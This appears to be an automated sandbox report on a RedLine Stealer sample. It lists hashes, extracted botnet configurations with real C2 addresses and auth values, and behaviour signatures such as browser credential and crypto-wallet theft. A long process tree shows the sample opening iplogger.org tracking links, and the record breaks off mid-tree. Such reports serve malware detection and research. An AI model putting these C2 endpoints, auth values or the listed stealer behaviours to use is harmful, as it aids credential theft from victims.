Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-08-2022 06:00

General

  • Target

    bb8280909fc1e2c496c93c57f5c814ec.exe

  • Size

    1.7MB

  • MD5

    bb8280909fc1e2c496c93c57f5c814ec

  • SHA1

    7d70a7fb02119891e88f8ec50a2878ae0856b83b

  • SHA256

    cd846ec4ec9c0f6e6078d73b1e32b2488179f597307bcdf1777388192e916d54

  • SHA512

    1c72c19d5bdd14b4d28049036ff6215fe3c448c92770d6f5ef8c1d1d913287d2d8340e6a514f604620b890ecec82ec126f14712151b8deb5c23999358dd3508a

Malware Config

Extracted

Family

redline

Botnet

nam3

C2

103.89.90.61:34589

Attributes
  • auth_value

    64b900120bbceaa6a9c60e9079492895

Extracted

Family

redline

Botnet

5

C2

176.113.115.146:9582

Attributes
  • auth_value

    d38b30c1ccd6c1e5088d9e5bd9e51b0f

Extracted

Family

redline

Botnet

@tag12312341

C2

62.204.41.144:14096

Attributes
  • auth_value

    71466795417275fac01979e57016e277

Extracted

Family

redline

Botnet

RuXaRR_GG

C2

insttaller.com:40915

Attributes
  • auth_value

    4a733ff307847db3ee220c11d113a305

Extracted

Family

redline

Botnet

5076357887

C2

195.54.170.157:16525

Attributes
  • auth_value

    0dfaff60271d374d0c206d19883e06f3

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 15 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 13 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Program Files directory 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bb8280909fc1e2c496c93c57f5c814ec.exe
    "C:\Users\Admin\AppData\Local\Temp\bb8280909fc1e2c496c93c57f5c814ec.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:3536
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AbtZ4
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1784
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff3b3e46f8,0x7fff3b3e4708,0x7fff3b3e4718
        3⤵
          PID:3224
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,2511882932554297836,16725243187462502033,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
          3⤵
            PID:5528
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,2511882932554297836,16725243187462502033,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:5820
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RyjC4
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2680
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7fff3b3e46f8,0x7fff3b3e4708,0x7fff3b3e4718
            3⤵
              PID:2532
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,16133051136500072811,8384569319913433815,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
              3⤵
                PID:5304
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,16133051136500072811,8384569319913433815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:5776
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1A4aK4
              2⤵
              • Adds Run key to start application
              • Enumerates system info in registry
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:2492
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff3b3e46f8,0x7fff3b3e4708,0x7fff3b3e4718
                3⤵
                  PID:3868
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2588 /prefetch:2
                  3⤵
                    PID:5032
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 /prefetch:3
                    3⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5316
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8
                    3⤵
                      PID:5396
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:1
                      3⤵
                        PID:5908
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3048 /prefetch:1
                        3⤵
                          PID:5616
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4004 /prefetch:1
                          3⤵
                            PID:6184
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4220 /prefetch:1
                            3⤵
                              PID:6352
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1
                              3⤵
                                PID:6444
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
                                3⤵
                                  PID:6624
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
                                  3⤵
                                    PID:6664
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
                                    3⤵
                                      PID:6752
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
                                      3⤵
                                        PID:6832
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4200 /prefetch:8
                                        3⤵
                                          PID:7124
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6916 /prefetch:1
                                          3⤵
                                            PID:728
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:1
                                            3⤵
                                              PID:5364
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8240 /prefetch:8
                                              3⤵
                                                PID:4600
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                                3⤵
                                                • Drops file in Program Files directory
                                                PID:1568
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff716e65460,0x7ff716e65470,0x7ff716e65480
                                                  4⤵
                                                    PID:4844
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8240 /prefetch:8
                                                  3⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:5420
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8128 /prefetch:8
                                                  3⤵
                                                    PID:4436
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2440 /prefetch:8
                                                    3⤵
                                                      PID:3944
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:1
                                                      3⤵
                                                        PID:3928
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6960 /prefetch:2
                                                        3⤵
                                                          PID:3440
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:1
                                                          3⤵
                                                            PID:5172
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6744 /prefetch:8
                                                            3⤵
                                                              PID:4420
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,8042411649730243798,15893872986801689521,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
                                                              3⤵
                                                                PID:2256
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RLtX4
                                                              2⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:4808
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff3b3e46f8,0x7fff3b3e4708,0x7fff3b3e4718
                                                                3⤵
                                                                  PID:4432
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,16416295548885498740,18029635864021401400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
                                                                  3⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:5240
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RCgX4
                                                                2⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3200
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff3b3e46f8,0x7fff3b3e4708,0x7fff3b3e4718
                                                                  3⤵
                                                                    PID:1480
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,6962781312441082364,15616813563437306711,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
                                                                    3⤵
                                                                      PID:5016
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,6962781312441082364,15616813563437306711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
                                                                      3⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:5324
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1nhGL4
                                                                    2⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:3812
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff3b3e46f8,0x7fff3b3e4708,0x7fff3b3e4718
                                                                      3⤵
                                                                        PID:2132
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,16560283976769550032,9246793744006409719,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3
                                                                        3⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:1400
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1A3AZ4
                                                                      2⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:1580
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff3b3e46f8,0x7fff3b3e4708,0x7fff3b3e4718
                                                                        3⤵
                                                                          PID:4872
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1456,6287533862071504759,3188029271918001187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 /prefetch:3
                                                                          3⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:1300
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1ALSZ4
                                                                        2⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4840
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
